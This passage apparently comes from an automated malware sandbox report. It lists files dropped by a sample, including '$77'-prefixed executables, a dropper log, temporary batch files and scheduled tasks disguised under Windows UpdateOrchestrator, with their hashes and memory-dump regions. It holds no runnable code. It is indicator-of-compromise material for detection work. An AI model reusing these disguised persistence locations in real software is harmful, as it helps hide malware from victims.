  SHA256: 1063934742a6e15a378f49d13630faf75fc99eb37432c0b2efdc9af3dad103fb
  SHA512: f246e9170d1b9da51b322d73fed994c7bd35a0bf6a2ddeec600e0a8a386cf82a0cfb28517e220a98d7dfb19cdc61eaf56275f1c2d16920d4f984390d98c6f0ed
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dropper.exe.log
  Filesize: 425B
  MD5: 4eaca4566b22b01cd3bc115b9b0b2196
  SHA1: e743e0792c19f71740416e7b3c061d9f1336bf94
  SHA256: 34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
  SHA512: bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
- C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize: 66KB
  MD5: 514d0abd73e992c2a1622795b33f17f4
  SHA1: 96740e82d7a119d808000783507bd92690584fe6
  SHA256: b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53
  SHA512: 4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8
- C:\Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
- C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize: 256KB
  MD5: 18f497deffe88b6b2cff336a277aface
  SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
- C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize: 299KB
  MD5: 12d2d1f43b0ecf5a949adde54b1ffb65
  SHA1: ad0529bc9102210f3616c7b626c37d6454d44033
  SHA256: 619b345f6803d45bcf20305efb3407a8ae26ba0aaffe38e7b5f31cb8c26101ef
  SHA512: 0a55fc91d0bc7e3123b16b012c70c15f731c3be1f8499c733cc994fcec43d8cdf6279e0b9eedda35035423c8891e076be374c512d6506d81e1f81802af25153f
- C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.bat
  Filesize: 155B
  MD5: cf6f69e74f621aff876514aed5d97fba
  SHA1: 5b9d4426a5b5fdc9e133805c3cbdc8f315e2f9cd
  SHA256: 4a376d4ee53a165b79922cb37f65ec60b3c2b47c8eac3a16cad94fda1cc3376d
  SHA512: 549d279392208b9172a102ff0aa5ed48c02d14e469cabd998d8d37b4b9a20e0e896630ab6d135a0b187f6a813c22ec0f2bd0e3185e1bb5856badaf6e466456c5
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize: 2KB
  MD5: 8abf2d6067c6f3191a015f84aa9b6efe
  SHA1: 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
  SHA256: ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
  SHA512: c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize: 2KB
  MD5: f313c5b4f95605026428425586317353
  SHA1: 06be66fa06e1cffc54459c38d3d258f46669d01a
  SHA256: 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
  SHA512: b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1: a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256: 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512: 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
  MD5: 7d612892b20e70250dbd00d0cdd4f09b
  SHA1: 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256: 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512: f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1: 5fd0a67671430f66237f483eef39ff599b892272
  SHA256: 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512: 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize: 2KB
  MD5: 0b990e24f1e839462c0ac35fef1d119e
  SHA1: 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
  SHA256: a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
  SHA512: c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
- C:\Windows\TEMP\tmp58D9.tmp.bat
  Filesize: 163B
  MD5: 10fb0ba32d785621cf5eb84f9b8c6d20
  SHA1: 25eb07e54fdda1432e1f64a861562dbf76c840c2
  SHA256: e74fcf3d96338859b2790228d4eb3f822bb8573f49ba3df8c381c74d9626033d
  SHA512: f085a2ae4e80fd652ebf617cee7bbb3e0c75687cb2fcd7dec1e9213c7ac7a1afe5b172ebb689117c8dc2b7171aacf7e73be9f15cae1d48b2abb145df9d41fa69
- C:\Windows\Temp\__PSScriptPolicyTest_cdvtq5xj.cqq.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- memory/388-102-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
  Filesize: 64KB
- memory/388-95-0x00000288319C0000-0x00000288319EB000-memory.dmp
  Filesize: 172KB
- memory/388-101-0x00000288319C0000-0x00000288319EB000-memory.dmp
  Filesize: 172KB
- memory/528-106-0x000002B4E0DA0000-0x000002B4E0DCB000-memory.dmp
  Filesize: 172KB
- memory/632-68-0x000002832EE90000-0x000002832EEBB000-memory.dmp
  Filesize: 172KB
- memory/632-60-0x000002832EE60000-0x000002832EE85000-memory.dmp
  Filesize: 148KB
- memory/632-62-0x000002832EE90000-0x000002832EEBB000-memory.dmp
  Filesize: 172KB
- memory/632-69-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
  Filesize: 64KB
- memory/632-61-0x000002832EE90000-0x000002832EEBB000-memory.dmp
  Filesize: 172KB
- memory/688-73-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmp
  Filesize: 172KB
- memory/688-79-0x000001A6C93D0000-0x000001A6C93FB000-memory.dmp
  Filesize: 172KB
- memory/688-80-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
  Filesize: 64KB
- memory/968-90-0x0000018F307D0000-0x0000018F307FB000-memory.dmp
  Filesize: 172KB
- memory/968-84-0x0000018F307D0000-0x0000018F307FB000-memory.dmp
  Filesize: 172KB
- memory/968-91-0x00007FF9B5770000-0x00007FF9B5780000-memory.dmp
  Filesize: 64KB
- memory/1308-38-0x000002161E730000-0x000002161E752000-memory.dmp
  Filesize: 136KB
- memory/1308-46-0x0000021636F80000-0x0000021636FAA000-memory.dmp
  Filesize: 168KB
- memory/1308-47-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp
  Filesize: 2.0MB
- memory/1308-48-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmp
  Filesize: 760KB
- memory/1724-56-0x00007FF9F3DB0000-0x00007FF9F3E6E000-memory.dmp
  Filesize: 760KB
- memory/1724-57-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-52-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-49-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-54-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-50-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-51-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/1724-55-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp
  Filesize: 2.0MB
- memory/1736-985-0x000000001CEE0000-0x000000001CF56000-memory.dmp
  Filesize: 472KB
- memory/1736-17-0x0000000001120000-0x0000000001126000-memory.dmp
  Filesize: 24KB
- memory/1736-16-0x0000000000930000-0x0000000000976000-memory.dmp
  Filesize: 280KB
- memory/1964-32-0x0000000074E40000-0x00000000755F0000-memory.dmp
  Filesize: 7.7MB
- memory/1964-4-0x0000000074E40000-0x00000000755F0000-memory.dmp
  Filesize: 7.7MB
- memory/2316-8-0x0000000000B90000-0x0000000000BA6000-memory.dmp
  Filesize: 88KB
- memory/4304-12-0x00000000009B0000-0x0000000000A02000-memory.dmp
  Filesize: 328KB
- memory/4544-0-0x0000000074E4E000-0x0000000074E4F000-memory.dmp
  Filesize: 4KB
- memory/4544-1-0x0000000000600000-0x000000000060A000-memory.dmp
  Filesize: 40KB